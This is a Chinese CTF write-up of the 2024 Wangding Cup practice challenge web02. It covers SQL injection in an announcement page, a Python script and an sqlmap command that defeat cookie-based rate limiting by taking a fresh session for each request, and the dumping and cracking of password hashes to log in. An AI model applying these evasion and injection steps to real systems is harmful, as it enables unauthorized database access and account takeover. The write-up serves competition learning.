当前位置: 首页 > article >正文

2024-网鼎杯第二次模拟练习-web02

进入做题页面,经过信息搜集和目录扫描,发现只有一个公告是可以利用的

`http://0192c74e0f9871c2956795c804c3dde3.8nfp.dg01.wangdingcup.com:43014/OA_announcement.php?id=1`

这个后面有一个明显的注入点,经过多次刷新和快速刷新后发现,会出现非法操作

经过探究发现,是Cookie变了,当被频繁刷新的时候,Cookie就会被禁用,就会触发非法操作。

也就意味着我们每次进行注入的时候,要么时间间隔大于1秒一次,要么每次都获取新的Cookie

这里直接上python代码

import requests
import time

while True:
    sess = requests.session()
    r = sess.get("http://0192c74e0f9871c2956795c804c3dde3.8nfp.dg01.wangdingcup.com:43014/")

    x = input()

    start = time.time_ns()
    r = sess.get("http://0192c74e0f9871c2956795c804c3dde3.8nfp.dg01.wangdingcup.com:43014/OA_announcement.php?id={}".format(x))
    stop = time.time_ns()
    print(r.text)
    # print(sess.headers, r.headers)
    print()
    print((stop-start)//1000//1000)
    print(x)
    print("========================================================\n")

可以通过输入来进行拼接URL,每次都是新的Cookie,这里还加了计时,方便进行时间盲注(结果发现根本用不上,部分代码可以删掉)

经过发现是需要4列,其中2,3列回显

剩下的就很简单了

idOAnamePassWordStatus
22009371209bd109afc78d44da53aafe2a2f5c1a2070
120093402186fbb6973fa60551e5f09d22a51fd959d1
32009371210ce01248197cd82fb524811d48bf3ded61

这就是用户表了,之前也说了,这是一个弱密码,如果联网情况下可以去`cmd5`网页进行查询,如果是本地,一般也就是6-8位数字,经过查询,用户0和3的能查到密码,用户0被封禁了,所以只能是用户3登录

轻松拿到flag

当然,这么简单的注入,也肯定要来一点sqlmap的震撼

`sqlmap -u "http://0192c74e0f9871c2956795c804c3dde3.8nfp.dg01.wangdingcup.com:43014/OA_announcement.php?id=1" --eval="import requests; s = requests.Session(); s.get('http://0192c74e0f9871c2956795c804c3dde3.8nfp.dg01.wangdingcup.com:43014/'); cookie = '; '.join([f'{k}={v}' for k, v in s.cookies.items()])" --random-agent --delay=1 --dbs
`

这个可以每次保证请求间隔1秒以上顺便每次都会有个新Cookie, sqlmap的后续操作就不多做说明了,已经很震撼了


http://www.kler.cn/a/372336.html

相关文章:

  • 揭秘文件上传漏洞之操作原理(Thoughts on File Upload Vulnerabilities)
  • terminal_学习
  • shell学习变量(二)
  • 鸿蒙开发:了解正则表达式
  • SQL 实战:联合查询与子查询 – 数据比对与关联查询优化
  • 【基于rust-wasm的前端页面转pdf组件和示例】
  • 【数据结构与算法】力扣 23. 合并 K 个升序链表
  • 正则表达式:强大的文本匹配与处理工具
  • 【数据库】数据库管理(上)事务 视图 索引分类以及生效规则
  • 【计算机网络 - 基础问题】每日 3 题(五十九)
  • Spring Boot框架实现的学生宿舍信息综合管理
  • 100种算法【Python版】第28篇——扩展欧几里得算法
  • Unity3D 鼠标移动到按钮上显示信息
  • vue3+vant实现视频播放(含首次禁止进度条拖拽,视频看完后恢复,保存播放视频进度,刷新及下次进入继续播放,判断视频有无全部看完等)
  • 记第一次本地编译seatunnel源码
  • 常见网安面试题
  • git log 用法详解
  • mysql遇到的问题
  • Optuna深度学习自动调参工具使用简明教程
  • Java 文件路径一口气讲完!(* ̄3 ̄)╭
  • 牛客网刷题(3)(Java的几种常用包)
  • 实操|如何优雅的实现RAG与GraphRAG应用中的知识文档增量更新?
  • Webserver(1.8)操作函数
  • CSS常见适配布局方式
  • 逆变器竞品分析--倍思500W方案【2024/10/30】
  • Android 快捷方式